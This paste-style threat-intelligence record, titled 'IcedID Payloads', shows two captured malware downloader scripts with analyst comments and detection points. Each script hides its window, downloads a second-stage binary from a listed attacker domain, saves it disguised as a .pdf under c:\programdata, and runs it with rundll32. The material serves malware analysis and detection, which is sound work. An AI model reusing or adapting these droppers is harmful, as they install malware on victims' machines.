MalwareMessiagh

IcedID Payloads

Dec 15th, 2020
  1. Domain: ietbean7[.]com
  2. Payload:
  <!-- Analyst note: downloader script as captured in this paste. It fetches a binary over HTTP,
       writes it under c:\programdata with a .pdf extension, and hands it to rundll32.
       Presumably delivered as an HTA (mshta.exe); the page does not say, so confirm against the sample.
       Detection points visible here: a script host spawning rundll32, rundll32 loading a non-.dll path
       under c:\programdata, and HTTP GETs to the /forum/viewpost/ path on the listed domain. -->
  3. <script language="javascript">
     // The next three strings are stored reversed (presumably to defeat plain string matching).
     // Decodes to "wscript.shell".
  4. var aAS6q = "llehs.tpircsw".split("").reverse().join("")
     // Decodes to "run".
  5. var a0buK = "nur".split("").reverse().join("")
     // Decodes to ",ShowDialogA -r": the export name and argument appended to the rundll32 command line.
  6. var aLSmEu = "r- AgolaiDwohS,".split("").reverse().join("")
     // Drop path. The .pdf extension is a disguise: the file is later passed to rundll32,
     // so it is presumably a DLL (verify on the dropped file).
  7. var aCHwi = "c:\\programdata\\az8mb9.pdf"
     // Shrink the window to 1x1 and move it off-screen so nothing is shown to the user.
  8. window.resizeTo(1, 1)
  9. window.moveTo(-10, -10)
     // Synchronous GET (third argument false) for the second-stage binary.
     // NOTE(review): the URL literal spans several lines in this paste; whether the key=value
     // lines belong to the request or are a capture artefact cannot be determined from the page.
  10. var aHa9o = new ActiveXObject("msxml2.xmlhttp")
  11. aHa9o.open("GET", "http://ietbean7.com/forum/viewpost/2uqs7lQIL2TXCMcZczPrZW5inxcgdANIcjEBYi2041NiC_mdMMdu45dmf72SqtRqt5UEWEcfRUx2/axgqo13
  12. xXMom=WFPzfyAh
  13. FvDML=LGbECTvIkDlIBUVDg
  14. lwc=HFwpTQVZn
  15. xu=UtxPChmLkTtNka
  16. HQmE=ZcJwJHmsN_OPQes
  17. mob=JTWWjKfKhTX_CSH", false)
  18. aHa9o.send()
  19. </script>
  20. <script language="vbscript">
     ' "rundll" is completed to "rundll32 " by the "32 " literal in the final command.
  21. a4HL6 = "rundll"
     ' Only write the file when the server answered 200.
  22. If aHa9o.status = 200 Then
  23. Set asGPdJ = CreateObject("adodb.stream")
  24. asGPdJ.Open
     ' Type 1 = binary stream (adTypeBinary).
  25. asGPdJ.Type = 1
  26. asGPdJ.Write aHa9o.responsebody
     ' Option 2 = create or overwrite (adSaveCreateOverWrite).
  27. asGPdJ.SaveToFile aCHwi, 2
  28. asGPdJ.Close
  29. End If
     ' Resolves to WScript.Shell.Run("rundll32 c:\programdata\az8mb9.pdf,ShowDialogA -r").
     ' NOTE(review): this line is JavaScript syntax inside the vbscript section and no closing
     ' </script> appears; the paste has probably lost a tag boundary.
  30. var aFRkN = new ActiveXObject(aAS6q)[a0buK](a4HL6 + "32 " + aCHwi + aLSmEu)
  31. window.close()
  32.  
  33. Domain: ufjypdinosaur6[.]com
  34. Payload:
  <!-- Analyst note: same downloader structure with different variable names, domain and drop file.
       It fetches a binary over HTTP, saves it as c:\programdata\aqjN7n.pdf and runs it via rundll32.
       Presumably delivered as an HTA (mshta.exe); the page does not say, so confirm against the sample.
       Detection points visible here: a script host spawning rundll32, rundll32 loading a non-.dll path
       under c:\programdata, and HTTP GETs to the /forum/viewpost/ path on the listed domain. -->
  35. <script language="javascript">
     // Reversed string; decodes to "wscript.shell".
  36. var aCAxiZ = "llehs.tpircsw".split("").reverse().join("")
     // Reversed string; decodes to "run".
  37. var aihwT = "nur".split("").reverse().join("")
     // Reversed string; decodes to ",ShowDialogA -r" (rundll32 export name plus argument).
  38. var aFgxY = "r- AgolaiDwohS,".split("").reverse().join("")
     // Drop path with a .pdf extension; the file is later given to rundll32,
     // so it is presumably a DLL (verify on the dropped file).
  39. var abuGR = "c:\\programdata\\aqjN7n.pdf"
     // 1x1 window moved off-screen: no visible UI.
  40. window.resizeTo(1, 1)
  41. window.moveTo(-10, -10)
     // Synchronous GET (third argument false) for the second-stage binary.
     // NOTE(review): the URL literal spans several lines in this paste; whether the key=value
     // lines belong to the request or are a capture artefact cannot be determined from the page.
  42. var a2n3Mr = new ActiveXObject("msxml2.xmlhttp")
  43. a2n3Mr.open("GET", "http://ufjypdinosaur6.com/forum/viewpost/VQ0Lz2/yhEEsvp28Yv0YUhva_k3I0bWj9V6B5CwhCX1szzWDrXDiRSQYg4/80NrBppkEzitJnZVLWw2/axgqo1
  44. k_kFv=bvmUMvtfVSwataV
  45. SXDAL=durjpDcHwSbKt
  46. thl=ZebeGBBKEWZ
  47. RF=IVpMWTVMn
  48. ZWU=ImjMOFwhvwCJl", false)
  49. a2n3Mr.send()
  50. </script>
  51. <script language="vbscript">
     ' Concatenated with "32 " below to form "rundll32 ".
  52. aoEc2 = "rundll"
     ' The response body is written to disk only on HTTP 200.
  53. If a2n3Mr.status = 200 Then
  54. Set audkh = CreateObject("adodb.stream")
  55. audkh.Open
     ' Type 1 = binary stream (adTypeBinary).
  56. audkh.Type = 1
  57. audkh.Write a2n3Mr.responsebody
     ' Option 2 = create or overwrite (adSaveCreateOverWrite).
  58. audkh.SaveToFile abuGR, 2
  59. audkh.Close
  60. End If
     ' Resolves to WScript.Shell.Run("rundll32 c:\programdata\aqjN7n.pdf,ShowDialogA -r").
     ' NOTE(review): JavaScript syntax inside the vbscript section and no closing </script>;
     ' the paste has probably lost a tag boundary.
  61. var aD72c = new ActiveXObject(aCAxiZ)[aihwT](aoEc2 + "32 " + abuGR + aFgxY)
  62. window.close()